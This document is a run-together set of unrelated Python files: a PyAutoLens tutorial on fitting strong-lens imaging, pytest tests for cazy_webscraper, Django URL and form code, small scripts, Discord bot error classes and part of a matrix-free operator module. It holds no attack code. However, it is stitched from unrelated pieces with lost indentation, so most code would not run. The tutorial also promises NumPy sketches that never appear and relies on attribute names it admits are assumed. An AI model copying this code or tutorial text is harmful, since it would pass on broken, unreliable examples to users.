# %%
"""
Tutorial 8: Fitting
===================
In this example, we'll fit the `Imaging` data we simulated in the previous exercise. We'll do this using model images
generated via a `Tracer`, and by comparing them to the simulated image we'll get diagnostics about the quality of the fit.
"""
# %%
#%matplotlib inline
from pyprojroot import here
workspace_path = str(here())
#%cd $workspace_path
print(f"Working Directory has been set to `{workspace_path}`")
from os import path
import autolens as al
import autolens.plot as aplt
# %%
"""
We'll need the path to the chapter in this tutorial to load the dataset from your hard-disk.
"""
# %%
"""
The `dataset_path` specifies where the data was output in the last tutorial, which is the directory
`autolens_workspace/dataset/howtolens/chapter_1`.
"""
# %%
dataset_path = path.join("dataset", "howtolens", "chapter_1")
imaging = al.Imaging.from_fits(
image_path=path.join(dataset_path, "image.fits"),
noise_map_path=path.join(dataset_path, "noise_map.fits"),
psf_path=path.join(dataset_path, "psf.fits"),
pixel_scales=0.1,
)
# %%
"""
The `imaging` is an `Imaging` object, which is a package of all components of the dataset, in particular:
1) The image.
2) The Point Spread Function (PSF).
3) Its noise-map.
These are all stored as `Array` objects.
"""
# %%
print("Image:")
print(imaging.image)
print("Noise-Map:")
print(imaging.noise_map)
print("PSF:")
print(imaging.psf)
# %%
"""
To fit an image, we first specify a `Mask2D`, which describes the sections of the image that we fit.
Typically, we want to mask regions of the image where the lens and source galaxies are not visible, for example at
the edges where the signal is entirely background sky and noise.
For the image we simulated, a 3" circular `Mask2D` will do the job.
A `Mask2D` also takes the `sub_size` parameter we are used to giving a `Grid`. It plays the same role here -
defining the (masked) sub-grid used to calculate lensing quantities from the mask (a short NumPy illustration of
sub-gridding follows below).
"""
# %%
mask = al.Mask2D.circular(
shape_2d=imaging.shape_2d, pixel_scales=imaging.pixel_scales, sub_size=1, radius=3.0
)
print(mask) # 1 = True, which means the pixel is masked. Edge pixels are indeed masked.
print(mask[48:53, 48:53]) # Whereas central pixels are `False` and therefore unmasked.
# %%
"""
We can use an `Imaging` `Plotter` to compare the mask and the image - this is useful if we really want to `tailor` a
mask to the lensed source's light (which in this example, we won't).
"""
# %%
aplt.Imaging.image(imaging=imaging, mask=mask)
# %%
"""
The `mask` automatically `zooms` our plot around the masked region only - meaning that if our image is very large, we
focus-in on the lens and source galaxies.
You'll see this is an option for pretty much every `Plotter` in **PyAutoLens**, and is something we'll do often throughout
the tutorials.
"""
# %%
"""
To fit the data we create a `MaskedImaging` object, which is a `package` of all parts of a data-set we need in order
to fit it with a lens model:
1) The imaging-data, including the image, PSF (so that when we compare a tracer's image to the observed image we
can include blurring due to the telescope optics) and noise-map (so our goodness-of-fit measure accounts for
noise in the observations).
2) The mask, so that only the regions of the image with a signal are fitted.
3) A `Grid` aligned to the `Imaging` data's pixels, so the tracer's image is generated on the same (masked) `Grid`
as the image.
"""
# %%
masked_imaging = al.MaskedImaging(imaging=imaging, mask=mask)
aplt.Imaging.image(imaging=masked_imaging.imaging)
# %%
"""
By printing its attributes, we can see that it does indeed contain the mask, masked image, masked noise-map, PSF and
so on.
"""
# %%
print("Mask2D")
print(masked_imaging.mask)
print()
print("Masked Image:")
print(masked_imaging.image)
print()
print("Masked Noise-Map:")
print(masked_imaging.noise_map)
print()
print("PSF:")
print(masked_imaging.psf)
print()
# %%
"""
The masked image and noise-map are again stored in 2D and 1D.
However, the 1D array now corresponds only to the pixels that were not masked, whereas for the 2D array, all edge
values are masked and are therefore zeros.
"""
# %%
print("The 2D Masked Image and 1D Image of unmasked entries")
print(masked_imaging.image.shape_2d)
print(masked_imaging.image.shape_1d)
print(masked_imaging.image.in_2d)
print(masked_imaging.image.in_1d)
print()
print("The 2D Masked Noise-Map and 1D Noise-Map of unmasked entries")
print(masked_imaging.noise_map.shape_2d)
print(masked_imaging.noise_map.shape_1d)
print(masked_imaging.noise_map.in_2d)
print(masked_imaging.noise_map.in_1d)
# %%
"""
The masked data also has a `Grid`, where only coordinates which are not masked are included (in the 2D grid, the
masked entries are set to (0.0, 0.0)).
"""
# %%
print("Masked Grid")
print(masked_imaging.grid.in_2d)
print(masked_imaging.grid.in_1d)
# %%
"""
To fit an image, we first create a model image using a `Tracer`. Let's use the same `Tracer` we simulated the `Imaging`
data with (thus, our fit is `perfect`).
It's worth noting that below, we use the `MaskedImaging`'s `Grid` to set up the `Tracer`. This ensures that our
image-plane image is the same resolution and alignment as our lens data's masked image.
"""
# %%
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllipticalIsothermal(
centre=(0.0, 0.0),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.7, phi=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllipticalSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, phi=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
aplt.Tracer.image(tracer=tracer, grid=masked_imaging.grid)
# %%
"""
To fit the image, we pass the `MaskedImaging` and `Tracer` to a `FitImaging` object. This performs the following:
1) Blurs the tracer's image with the lens data's PSF, ensuring the telescope optics are included in the fit. This
creates the fit's `model_image`.
2) Computes the difference between this model image and the observed image, creating the fit's `residual_map`.
3) Divides the residual-map by the noise-map, creating the fit's `normalized_residual_map`.
4) Squares every value in the normalized residual-map, creating the fit's `chi_squared_map`.
5) Sums up these chi-squared values and converts them to a `log_likelihood`, which quantifies how well the tracer
fits the data (higher log_likelihood = better fit).
A minimal NumPy sketch of these steps follows below.
"""
# %%
fit = al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit, include=aplt.Include(mask=True))
# %%
"""
We can print the fit's attributes. As usual, we can choose whether to return them in 2D or 1D; in 2D, all edge
values are zeros, as those pixels were masked:
"""
# %%
print("Model-Image:")
print(fit.model_image.in_2d)
print(fit.model_image.in_1d)
print()
print("Residual Maps:")
print(fit.residual_map.in_2d)
print(fit.residual_map.in_1d)
print()
print("Chi-Squareds Maps:")
print(fit.chi_squared_map.in_2d)
print(fit.chi_squared_map.in_1d)
# %%
"""
Of course, the central unmasked pixels have non-zero values.
"""
# %%
model_image = fit.model_image.in_2d
print(model_image[48:53, 48:53])
print()
residual_map = fit.residual_map.in_2d
print("Residuals Central Pixels:")
print(residual_map[48:53, 48:53])
print()
print("Chi-Squareds Central Pixels:")
chi_squared_map = fit.chi_squared_map.in_2d
print(chi_squared_map[48:53, 48:53])
# %%
"""
The fit also gives a log likelihood, which is a single-figure estimate of how well the model image fits the simulated
image (in unmasked pixels only!).
"""
# %%
print("Likelihood:")
print(fit.log_likelihood)
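# %%
"""
If you want to verify this number yourself, the fit also exposes its `chi_squared` and `noise_normalization` terms
(we assume these attribute names here, following the convention sketched above); the log likelihood is simply
-0.5 * (chi_squared + noise_normalization).
"""
# %%
print(-0.5 * (fit.chi_squared + fit.noise_normalization))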
# %%
"""
We can customize the `MaskedImaging` we set up, using the `SettingsMaskedImaging` object.
For example, we can:
- Specify the `Grid` used by the `MaskedImaging` to fit the data, where below we increase its `sub_size` from the
default value of 2 to 4.
- Bin up the masked `Imaging` by a factor of 2 (a small NumPy sketch of binning follows below). This decreases the
resolution of the data, losing us information, but makes the fit computationally faster (which will be important
in the next chapter).
"""
# %%
settings_masked_imaging = al.SettingsMaskedImaging(
grid_class=al.Grid, sub_size=4, bin_up_factor=2
)
masked_imaging_custom = al.MaskedImaging(
imaging=imaging, mask=mask, settings=settings_masked_imaging
)
# %%
"""
If we use this data to perform a fit, we can immediately note how the data has been binned up to a coarser resolution.
"""
# %%
fit_custom = al.FitImaging(masked_imaging=masked_imaging_custom, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit_custom, include=aplt.Include(mask=True))
# %%
"""
The use of `Settings` objects is a core feature of the **PyAutoLens** API and will appear throughout the **HowToLens**
chapters for setting up many different aspects of a **PyAutoLens** fit, so take note!
"""
# %%
"""
We used the same `Tracer` to create and fit the image, giving an excellent fit. The residual-map and chi-squared-map
show no signs of the source `Galaxy`'s light, indicating a good fit. This solution will translate to one of the
highest-log_likelihood solutions possible.
Let's change the `Tracer`, so that it's near the correct solution, but slightly off. Below, we slightly offset the lens
galaxy, by 0.005".
"""
# %%
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllipticalIsothermal(
centre=(0.005, 0.005),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.7, phi=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllipticalSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, phi=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
fit = al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit, include=aplt.Include(mask=True))
# %%
"""
Residuals now appear at the locations of the source galaxy, increasing the chi-squared values (which determine
our log_likelihood).
Let's compare the log likelihood to the value we computed above (which was 4593.86):
"""
# %%
print("Previous Likelihood:")
print(4593.8596)
print("New Likelihood:")
print(fit.log_likelihood)
# %%
"""
It decreases! As expected, this model is a worse fit to the data.
Let's change the `Tracer` one more time, to a solution nowhere near the correct one.
"""
# %%
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllipticalIsothermal(
centre=(0.005, 0.005),
einstein_radius=1.5,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.7, phi=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllipticalSersic(
centre=(0.2, 0.0),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, phi=60.0),
intensity=0.5,
effective_radius=0.8,
sersic_index=2.5,
),
)
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
fit = al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit, include=aplt.Include(mask=True))
# %%
"""
Clearly, the model provides a terrible fit, and this `Tracer` is not a plausible representation of the `Imaging` dataset
(of course, we already knew that, given that we simulated it!).
The log likelihood drops dramatically, as expected.
"""
# %%
print("Previous Likelihoods:")
print(4593.8596)
print(4478.4995)
print("New Likelihood:")
print(fit.log_likelihood)
# %%
"""
Congratulations, you've fitted your first strong lens with **PyAutoLens**! Perform the following exercises:
1) In this example, we `knew` the correct solution, because we simulated the lens ourselves. In the real Universe,
we have no idea what the correct solution is. How would you go about finding the correct solution? Could you find a
solution that fits the data reasonably well through trial and error? (A crude brute-force sketch follows below.)
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# (c) University of St Andrews 2022
# (c) University of Strathclyde 2022
# (c) James Hutton Institute 2022
#
# Author:
# Emma E. M. Hobbs
#
# Contact
# eemh1@st-andrews.ac.uk
#
# Emma E. M. Hobbs,
# Biomolecular Sciences Building,
# University of St Andrews,
# North Haugh Campus,
# St Andrews,
# KY16 9ST
# Scotland,
# UK
#
# The MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Tests cazy module
These tests are intended to be run from the root of the repository using:
pytest -v
"""
import json
import pandas as pd
from argparse import Namespace, ArgumentParser
from datetime import datetime
from pathlib import Path
import pytest
from sqlalchemy.exc import IntegrityError
from saintBioutils.utilities import logger as saint_logger
from saintBioutils.utilities import file_io as saint_fileIO
from cazy_webscraper import cazy
@pytest.fixture
def cazy_file_path():
return "tests/test_inputs/test_inputs_cazy/cazy_data.txt"
@pytest.fixture
def cazy_zip_path():
_path = "tests/test_inputs/test_inputs_cazy/cazy_db_timestamp.zip"
return _path
@pytest.fixture
def cazy_data_dict():
_dict = {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
return _dict
def test_get_cazy_file(cazy_file_path):
argsdict = {"args": Namespace(
retries=10,
cazy_data=cazy_file_path,
)}
cazy.get_cazy_txt_file_data(
"tests/test_inputs/test_inputs_cazy/",
"time_stamp",
argsdict['args'],
)
def test_parsing_cazy_zip(monkeypatch):
argsdict = {"args": Namespace(
retries=10,
cazy_data=None,
)}
    def mock_download(*args, **kwargs):
return
monkeypatch.setattr(cazy, "get_cazy_file", mock_download)
cazy.get_cazy_txt_file_data(
Path("tests/test_inputs/test_inputs_cazy/"),
"time_stamp",
argsdict['args'],
)
def test_failed_download(monkeypatch):
argsdict = {"args": Namespace(
retries=2,
cazy_data=None,
)}
    def mock_download(*args, **kwargs):
return "error"
monkeypatch.setattr(cazy, "get_cazy_file", mock_download)
with pytest.raises(SystemExit) as pytest_wrapped_e:
cazy.get_cazy_txt_file_data(
Path("tests/test_inputs/test_inputs_cazy/"),
"time_stamp",
argsdict['args'],
)
assert pytest_wrapped_e.type == SystemExit
def test_parse_all_cazy_data(cazy_file_path):
with open(cazy_file_path, "r") as fh:
cazy_lines = fh.read().splitlines()
assert cazy.parse_all_cazy_data(cazy_lines, None) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'BAX82587.1': {'kingdom': {'Bacteria'}, 'organism': {'Labilibaculum antarcticum SPP2'}, 'families': {'GH157': {None}}}, 'SDR68055.1': {'kingdom': {'Bacteria'}, 'organism': {'Polaribacter sp. KT25b'}, 'families': {'GH157': {None}}}, 'QXP79022.1': {'kingdom': {'Bacteria'}, 'organism': {'Winogradskyella sp. HaHa_3_26'}, 'families': {'GH157': {None}}}, 'QNK77973.1': {'kingdom': {'Bacteria'}, 'organism': {'Winogradskyella sp. PAMC22761'}, 'families': {'GH157': {None}}}, 'BCJ46567.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes ianthinogenes NBRC 13996'}, 'families': {'AA5': {'AA5_2'}, 'GH1': {None}}}, 'ATO81963.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes sp. SE50'}, 'families': {'AA5': {'AA5_2'}}}, 'AEV83893.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes sp. SE50/110'}, 'families': {'AA5': {'AA5_2'}}}, 'SLL99371.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes sp. SE50/110'}, 'families': {'AA5': {'AA5_2'}}}, 'CRK61066.1': {'kingdom': {'Bacteria'}, 'organism': {'Alloactinosynnema sp. L-07'}, 'families': {'AA5': {'AA5_2'}}}, 'AUZ88908.1': {'kingdom': {'Bacteria'}, 'organism': {'Arthrobacter agilis UMCV2'}, 'families': {'AA5': {'AA5_2'}}}, 'UKA55327.1': {'kingdom': {'Bacteria'}, 'organism': {'Arthrobacter sp. FW305-BF8'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW46863.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus AF13'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW38907.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus AF13'}, 'families': {'AA5': {'AA5_2'}}}, 'UCK59454.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus CA14'}, 'families': {'AA5': {'AA5_2'}}}, 'UDD63818.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus CA14'}, 'families': {'AA5': {'AA5_2'}}}, 'QRD87005.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL 3357'}, 'families': {'AA5': {'AA5_2'}}}, 'QRD91111.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL 3357'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW26827.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL3357'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW34793.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL3357'}, 'families': {'AA5': {'AA5_2'}}}, 'BAE64583.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus oryzae RIB40'}, 'families': {'AA5': {'AA5_2'}}}, 'BAE56565.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus oryzae RIB40'}, 'families': {'AA5': {'AA5_2'}}}, 'BCS28434.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus puulaauensis MK2'}, 'families': {'AA5': {'AA5_2'}}}, 'BCS18659.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus puulaauensis MK2'}, 'families': {'AA5': {'AA5_2'}}}, 'BAW27603.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus stellatus NBRC 32302'}, 'families': {'AA5': {'AA5_2'}}}}
def test_parse_cazy_data(cazy_file_path):
with open(cazy_file_path, "r") as fh:
cazy_lines = fh.read().splitlines()
assert cazy.parse_cazy_data_with_filters(
cazy_lines,
{'GH'},
{'Bacteria'},
{'GH157', 'AA5_2'},
{'Bacteroides', 'Aspergillus oryzae', 'Aspergillus flavus NRRL3357'},
None,
) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
def test_build_tax_dict():
cazy_data = {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
assert {
'Bacteria': {
'Bacteroides cellulosilyticus BFG-250', 'Bacteroides cellulosilyticus WH2',
}} == cazy.build_taxa_dict(cazy_data)
def test_apply_filters_no_tax(cazy_data_dict):
assert cazy.apply_kingdom_tax_filters(
cazy_data_dict,
set(),
set(),
'UBD70155.1',
'GH157',
None,
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == ({'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}, True)
def test_apply_tax_filters(cazy_data_dict):
assert cazy.apply_kingdom_tax_filters(
cazy_data_dict,
{'Bacteria'},
{'Bacteroides'},
'UBD70155.1',
'GH157',
None,
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == ({'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}, True)
def test_add_protein_to_dict(cazy_data_dict):
assert cazy.add_protein_to_dict(
cazy_data_dict,
'UBD70155.1',
'GH1',
'GH1_1',
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}, 'GH1': {'GH1_1'}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
def test_add_protein_to_dict_new_protein(cazy_data_dict):
assert cazy.add_protein_to_dict(
cazy_data_dict,
'UBD70155_new.1',
'GH1',
'GH1_1',
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'UBD70155_new.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH1': {'GH1_1'}}}}
"""定义blogs的URL模式"""
from django.conf.urls import url
from . import views
urlpatterns = [
#主页
url(r'^$',views.index,name = 'index'),
#显示所有的主题
url(r'^titles/$',views.titles,name = 'titles'),
#显示特定主题的博客
url(r'^titles/(?P<title_id>\d+)/$',views.title,name = 'title'),
#用于添加新主题的网页
url(r'^new_title/$',views.new_title,name = 'new_title'),
#用于添加新回复的页面
url(r'^new_blogpost/(?P<title_id>\d+)/$',views.new_blogpost,name = 'new_blogpost'),
#用于编辑现有的主题页面
url(r'^edit_blogpost/(?P<blogpost_id>\d+)/$',views.edit_blogpost,name = 'edit_blogpost'),
] |
from enum import Enum
class DriverTypes(Enum):
    chrome = "CHROME"
    firefox = "FIREFOX"
ie = "IE"
from django import forms
from ecomApp.models import Checkout,MyRating
class RatingForm(forms.ModelForm):
class Meta:
model = MyRating
fields=('rating',)
class OrderForm(forms.ModelForm):
class Meta:
model = Checkout
fields=('fullname','email','NameOnCard','Address','creditcardnumber','city','cardExpdate','state','zip','cvv')
import json
with open('movies.json', 'r', encoding='utf-8') as fin:
data = json.load(fin)
hits = data.get('hits')
for idx, movie in enumerate(hits, 1):
if 'comedy' in movie.get('genres'):
print("{}. {}".format(idx, movie.get('title', 'MISSING')))
data['hits'][0]['title'] = 'The Rundown 2, the revenge!'
with open('movies_edited.json', 'w', encoding='utf-8') as fout:
    json.dump(data, fout, indent=True)
import tensorflow as tf
# Use eager execution to embrace the upcoming tensorflow 2.0.
tf.enable_eager_execution()
x = tf.constant(4.5)
m = tf.multiply(x, x)
print("hello world {}".format(m))
from discord.ext import commands
class Info(commands.CommandError):
def __init__(self, message, **kwargs):
super().__init__(message)
self.kwargs = kwargs
class Warning(commands.CommandError):
def __init__(self, message, **kwargs):
super().__init__(message)
self.kwargs = kwargs
class Error(commands.CommandError):
def __init__(self, message, **kwargs):
super().__init__(message)
self.kwargs = kwargs
class LastFMError(commands.CommandError):
def __init__(self, error_code, message):
super().__init__()
self.error_code = error_code
self.message = message
def __str__(self):
return f"LastFM error {self.error_code}"
def display(self):
return f"LastFM error {self.error_code} : {self.message}"
class RendererError(commands.CommandError):
pass
class ServerTooBig(commands.CheckFailure):
def __init__(self, member_count):
super().__init__()
self.member_count = member_count
class Blacklist(commands.CommandError):
pass
class BlacklistedUser(Blacklist):
def __init__(self):
super().__init__()
self.message = "You have been blacklisted from using Miso Bot"
class BlacklistedMember(Blacklist):
def __init__(self):
super().__init__()
self.message = "You have been blacklisted from using commands by the server moderators"
class BlacklistedGuild(Blacklist):
def __init__(self):
super().__init__()
self.message = "This server is blacklisted from using Miso Bot"
class BlacklistedCommand(Blacklist):
def __init__(self):
super().__init__()
self.message = "This command has been disabled by the server moderators"
class BlacklistedChannel(Blacklist):
def __init__(self):
super().__init__()
self.message = "Command usage in this channel has been disabled by the server moderators"
"""
The operators specified in this module act like their matrix equivalent,
and attempt to match the basic building blocks in NumPy and other numerical
packages.
"""
import numpy as np
from functools import partial
from pyop import LinearOperator, matmat
from scipy.misc import doccer
docdict = {
'shape' :
"""shape : pair
The shape of the LinearOperator (if it were a matrix).""",
## The see also section.
'zeros' : "zeros : Matrix free version of the zeros matrix.",
'ones' : "ones : Matrix free version of the ones matrix.",
'eye' : "eye : Matrix free version of the eye matrix.",
'diag' : "diag : Convert a 1D array to matrix free diagonal matrix.",
'select' : "select : Select certain rows out of a matrix."
}
docfill = doccer.filldoc(docdict)
@docfill
def zeros(shape):
''' PyOp version of zeros array function (only 2D).
Returns a new LinearOperator that emulates a matrix filled with zeros.
Parameters
----------
%(shape)s
Returns
-------
LinearOperator
A functional version of numpy.zeros()
See Also
--------
%(ones)s
%(eye)s
%(diag)s
%(select)s
Examples
--------
>>> from pyop.operators import zeros
>>> from pyop import toMatrix
>>> toMatrix(zeros((2, 1)))
array([[ 0.],
[ 0.]])
>>> s = (2,2)
>>> toMatrix(zeros(s))
array([[ 0., 0.],
[ 0., 0.]])
'''
def zeroInput(x, op_shape):
return np.zeros((op_shape, x.shape[1]))
return LinearOperator(shape,
matmat(partial(zeroInput, op_shape = shape[0])),
matmat(partial(zeroInput, op_shape = shape[1])))
@docfill
def ones(shape):
''' PyOp version of ones array function (only 2D).
Returns a new LinearOperator that emulates a matrix filled with ones.
Parameters
----------
%(shape)s
Returns
-------
LinearOperator
A functional version of numpy.ones()
See Also
--------
%(zeros)s
%(eye)s
%(diag)s
%(select)s
Examples
--------
>>> from pyop.operators import ones
>>> from pyop import toMatrix
>>> toMatrix(ones((2, 1)))
array([[ 1.],
[ 1.]])
>>> s = (2,2)
>>> toMatrix(ones(s))
array([[ 1., 1.],
[ 1., 1.]])
'''
def sumColumns(x, op_shape):
column_sums = np.sum(x, axis = 0)
return np.tile(column_sums, (op_shape, 1))
return LinearOperator(shape,
matmat(partial(sumColumns, op_shape = shape[0])),
matmat(partial(sumColumns, op_shape = shape[1])))
@docfill
def eye(shape):
''' PyOp version of eye array function (only 2D).
Returns a new LinearOperator that emulates the identity matrix.
Parameters
----------
%(shape)s
Returns
-------
LinearOperator
A functional version of numpy.eye()
See Also
--------
%(zeros)s
%(ones)s
%(diag)s
%(select)s
Examples
--------
>>> from pyop.operators import eye
>>> from pyop import toMatrix
>>> toMatrix(eye((2, 1)))
array([[ 1.],
[ 0.]])
>>> s = (2,2)
>>> toMatrix(eye(s))
array([[ 1., 0.],
[ 0., 1.]])
'''
def identity(x, op_shape):
m, n = op_shape
p, q = x.shape
if m > n:
return np.vstack([x, np.zeros((m - p, q))])
elif m <= n:
return x[:m]
return LinearOperator(shape,
matmat(partial(identity, op_shape = shape)),
matmat(partial(identity, op_shape = shape[::-1])))
@docfill
def select(rows, perm):
''' Select only certain rows of a matrix.
This operator selects only certain rows from a matrix. It can be
    particularly useful for consensus or sharing optimization problems.
The input perm can be in any order, and duplicates can be made. In this
manner, it is possible to make a permutation matrix by including an
input that includes each row once and only once.
Parameters
----------
rows : integer
The number of total rows to be selected from.
perm : list
A list of the rows to take. This will define the shape of the
resulting LinearOperator.
Returns
-------
LinearOperator
A LinearOperator that performs the selection on np.array inputs.
See Also
--------
%(zeros)s
%(ones)s
%(eye)s
%(diag)s
Examples
--------
>>> from pyop.operators import select
>>> import numpy as np
>>> S = select(4, [0, 1, 3])
>>> S(np.array([1, 2, 3, 4]))
array([1, 2, 4])
>>> S = select(4, [0, 1, 1])
>>> S(np.array([1, 2, 3, 4]))
array([1, 2, 2])
'''
@matmat
def subset(x):
return x[perm]
@matmat
def expand(x):
ret_shape = (rows, x.shape[1])
ret = np.zeros(ret_shape)
np.add.at(ret, perm, x)
return ret
return LinearOperator((len(perm), rows), subset, expand)
@docfill
def diag(v):
''' Create a LinearOperator that emulates a diagonal matrix.
Creates a LinearOperator that scales each row of its input by the
corresponding element of the input vector v. The length of the vector v
defines the shape of the operator (n by n).
Parameters
----------
v : 1-D array
An array by which to scale each of rows of the input.
Returns
-------
LinearOperator
A LinearOperator that scales np.array inputs.
See Also
--------
%(zeros)s
%(ones)s
%(eye)s
%(select)s
Examples
--------
>>> from pyop.operators import diag
>>> from pyop import toMatrix
>>> import numpy as np
>>> toMatrix(diag(np.array([1, 2, 3, 4])))
array([[ 1., 0., 0., 0.],
[ 0., 2., 0., 0.],
